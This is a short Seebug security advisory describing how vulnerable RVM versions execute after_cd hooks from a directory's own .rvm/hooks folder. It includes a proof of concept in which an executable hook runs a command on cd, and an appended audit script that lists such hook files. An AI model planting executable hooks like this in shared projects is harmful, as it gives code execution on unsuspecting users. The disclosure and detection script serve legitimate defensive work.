seebug | Root | SSV:92688
History | Feb 16, 2017 - 12:00 a.m.

RVM automatically executes hooks located in $PWD

RVM, by default, hooks cd and automatically executes various auxiliary hooks
when a user changes into a directory. The mechanics of these additional
after_cd hooks are detailed at <https://rvm.io/workflow/hooks>.

What this page fails to mention is that, in vulnerable versions, hooks are
loaded not only from ~/.rvm/hooks but also from $PWD/.rvm/hooks, as shown by
the code in a vulnerable commit at
<https://github.com/rvm/rvm/blob/b04c0158d/scripts/hook#L23-L27>.

This behaviour can be used to achieve arbitrary command execution when a user
changes into a directory with malicious contents.

Note that hook files must be executable for them to be triggered.

POC

rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks

rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc
#!/bin/sh
echo "Command execution as $(id)"
^D

rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc

rvm@e6aeaf6d79ec:~$ cd poc

Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm)
rvm@e6aeaf6d79ec:~/poc$
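
A defensive check for the behaviour described above, added here as an example and not part of the original advisory or of RVM: it lists executable files under any project-local .rvm/hooks directory so they can be reviewed before anyone changes into that tree. The function names are hypothetical, and flagging every executable file regardless of its name is a conservative assumption of this sketch.

```shell
#!/bin/sh
# Added audit sketch (not RVM code): find executable files in project-local
# .rvm/hooks directories, i.e. the $PWD/.rvm/hooks location the advisory
# says vulnerable RVM versions load hooks from on cd.

# scan_rvm_hooks ROOT [TRUSTED]
# Prints one path per line for every executable file below any
# */.rvm/hooks directory under ROOT. Files under TRUSTED (default:
# $HOME/.rvm, the user's own RVM directory) are skipped. Pass ROOT as an
# absolute path so the TRUSTED exclusion can match.
# Assumption: file names do not contain newlines.
scan_rvm_hooks() {
    root=$1
    trusted=${2:-$HOME/.rvm}
    # Symlinks are included because -x below follows them.
    find "$root" \( -type f -o -type l \) -path '*/.rvm/hooks/*' \
        ! -path "$trusted/*" -print 2>/dev/null |
    while IFS= read -r f; do
        # The advisory notes that only executable hook files are triggered.
        if [ -x "$f" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# has_local_rvm_hooks DIR [TRUSTED]
# Exit status 0 if DIR/.rvm/hooks contains at least one executable file,
# 1 otherwise. Intended as a check before changing into DIR.
has_local_rvm_hooks() {
    [ -d "$1/.rvm/hooks" ] || return 1
    [ -n "$(scan_rvm_hooks "$1/.rvm/hooks" "${2:-$HOME/.rvm}")" ]
}
```

Running `scan_rvm_hooks /absolute/path/to/checkouts` over directories of cloned or unpacked third-party content gives a list of files to inspect; an empty result means no executable hook files were found there.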